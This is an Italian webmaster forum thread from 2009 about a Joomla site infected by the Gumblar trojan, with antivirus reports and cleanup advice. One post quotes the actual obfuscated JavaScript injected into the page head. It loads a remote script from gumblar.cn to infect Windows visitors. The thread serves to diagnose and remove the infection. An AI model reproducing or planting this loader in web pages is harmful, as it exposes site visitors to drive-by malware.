Trojan nel website

salve

Vi scrivo perchè da un paio di giorni, aprendo il mio website con IE mi compare un'avviso di Trojan dal mio antivirus che conseguentemente non mi fa accedere al sito!

qualcuno sa aiutarmi?

Il mio Sophos (ma anceh con kaspersky) dice:

Richiesta bloccata: la posizione presenta contenuti malevoli
Minaccia: Troj/JSRedir-R

Origine minaccia: http://www.nightingales.altervista.org/site/
La posizione richiesta presenta dei contenuti malevoli e pertanto ne è stato bloccato il download.


AIUTOO!

[seneca]

Qual è il codice della tua pagina web?

Non capsico bene cosa intendi per codice

Cmq ho un sito fatto con joomla ed è il seguente
http://www.nightingales.altervista.org/site/

grazie per la pronta risposta

[seneca]

Siccome il mio antivirus mi nega la visualizzazione della pagina, ti chiedevo di vedere il codice html della pagina. Sicuramente hai messo qualche script, ad esempio un servizio di statistiche, che porta con se un virus.

mmm

Utilizzo shinystat, ma non mi ha mai dato problemi
Inoltre con il firefox non c'è nessun problema, vado su

http://www.nightingales.altervista.org/site/index.php

e noto che prima mi ridireziona ad un sito "gumblar.cn" e poi apre la pagina senza problemi. In explorer per qeusto problema non la fa aprire...dove può essere il problema?

[darkwolf]

A me Avira non segnala niente di anomalo (ma ho firefox con noscript) comunque l'unica anomalia è questo Javascript (non riesco a decodificarlo):

Codice PHP:

</head><script language=javascript><!--
(function(){var pIre='%';var foSu='v#61r#20a#3d#22Sc#72ip#74E#6e#67ine#22#2cb#3d#22#56e#72si#6fn()+#22#2c#6a#3d#22#22#2cu#3dnavig#61t#6fr#2e#75s#65#72#41ge#6et#3bi#66((u#2ei#6edex#4ff(#22#57in#22)#3e0)#26#26(#75#2einde#78Of#28#22#4eT#20#36#22#29#3c#30)#26#26(document#2e#63ooki#65#2eindexOf(#22miek#3d#31#22#29#3c0)#26#26#28t#79peof(zrv#7ats#29#21#3dt#79pe#6ff(#22A#22)#29)#7bzrvzts#3d#22A#22#3beval(#22if(window#2e#22+a#2b#22)j#3dj+#22+a+#22Ma#6ao#72#22#2bb+#61+#22Min#6fr#22#2bb+a+#22Build#22+#62+#22#6a#3b#22)#3b#64ocume#6e#74#2ew#72#69te#28#22#3c#73cript#20src#3d#2f#2fgumblar#2e#63n#2frss#2f#3fid#3d#22+j+#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';eval(unescape(foSu.replace(/#/g,pIre)))})();
--></script>
<body id="page_bg">


[angolodicielo]

Confermo la presenza del virus rilevata con KIS 2009, stranamente rilevato aprendo questa pagina del forum di AV... non oso pensare che accade se clicco direttamente sul link...

Il messaggio è il seguente:

27/05/2009 19.10.25 Rilevato: Trojan-Downloader.JS.Gumblar.a Internet Explorer http://www.nightingales.altervista.org/site/index.php

Aggiorno per nuovo messaggio leggermente diverso:

Caricamento dell'oggetto http://www.nightingales.altervista.org/site/index.php
contenente Trojan program Trojan-Downloader.JS.Gumblar.a Rilevato

Sempre in riferimento a questo post...

Grazie ragazzi

Ho utilizzato un vecchio file di BACKUP e la situazione sembra RISOLTA.

SOLUZIONE: Ho copiato l'header del backup e l'ho cambiato all'index.php

Non so cosa possa essere stato spero non capiti in futuro

grazie a tutti

Problema tornato!!!

grrrr

[darkwolf]

Hai l'ultima versione di Joomla?
Potrebbe anche essere infetto il tuo pc e di conseguenza infetta automaticamente il sito
Prova a fare una scansione completa del sistema
--
PS: come da regolamento, non fare doppi post.

[angolodicielo]

Infatti... prima di tutto devi pulire per bene il tuo PC...
Oltre al tuo antivirus, presente nel sistema, integra con qualche scansione online...
Quando sei sicuro che il PC sia pulito, ti conviene cancellare tutto dallo spazio web,
e ripristinare un backup pulito...
Poi non so se lo staff di AV, ti può indicare qualche procedura per pulire lo spazio web,
se se ne occupano loro, o se è sufficiente cancellare tutto...
Ti conviene anche vedere su Kaspersky lab, cosa dicono in merito a questo trojan



P.S.
D'accordo server linux... ma qui su AV c'è un antivirus che controlla i server??

P.S.
D'accordo server linux... ma qui su AV c'è un antivirus che controlla i server??

Penso proprio di si... Sarebbe come costruire una casa senza l'utilizzo del cemento... Alla prima folata di vento vien giù tutto

[darkwolf]

Penso proprio di si... Sarebbe come costruire una casa senza l'utilizzo del cemento... Alla prima folata di vento vien giù tutto

In ogni caso solo 10 Antivirus su 40 rilevano il codice maligno: http://www.virustotal.com/analisis/5...26f-1243447330

[angolodicielo]

Sull'enciclopedia dei virus della Kaspersky lab, il virus in questione, non risulta...
quindi, è verosimile che si tratti di un nuovo virus, (o meglio una nuova variante di uno vecchio)...
Questo spiega perchè attualmente, alcuni antivirus non lo identificano...
Se è così, fra un paio di settimane, il risultato di virus total, sarà inverso....

[darkwolf]

So che è OT ma credo possa essere utile.
Ho salvato il codice in un file di testo e l'ho inviato in allegato ad avira con il link del risultato di virustotal.
Questa la risposta ricevuta:

Avira Virus Lab Response Team ha scritto:
>
> Dear Sir or Madam,
>
> Thank you for your email to Avira's virus lab.
> Tracking number: INC00315288.
>
> A listing of files alongside their results can be found below:
> File ID Filename Size (Byte) Result
> 25357509 viruscode.txt 741 Byte MALWARE
>
>
> Please find a detailed report concerning each individual sample below:
> Filename Result
> viruscode.txt MALWARE
>
> The file 'viruscode.txt' has been determined to be 'MALWARE'. Our analysts named the threat JS/Gumblar.B. The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Ciao ragazzi

Io il problema l'ho risolto ma non auguro a nessuno di avere questo virus perchè ho passato un brutto pomeriggio. Questi sono i sintomi:

1) ogni file index.xtm o php è corrotto con una stringa di codice INIZIALE facilmente riconoscibile perchè semi-incomprensibile

2) molti file .php sono corrotti con una ccon una stringa di codice FINALE facilmente riconoscibile perchè semi-incomprensibile

3) Il virus crea/modifica dei file image.php , solitamente in cartelle images che sono totalmetne da cancellare

CONSIGLIO:

1) se avete una copia di backup funzionante siete salvi
2) Scorrete via FTP i files e controllate tutti i file con data relativa a quella dell'infezione. Ve ne accorgete verificando un qualsaisi file index.htm

Ho passato 3 ore a pulire tutto perchè non avevo file di backup....ora è tutto ok.
provare per credere

www.nightingales.it (vi reindirizza al server altervista)

Ciao a tutti e grazie!

[angolodicielo]

Sono entrato nel tuo sito..
ho cliccato qua e là...
nessuna segnalazione del kaspersky...


Bella la Luna!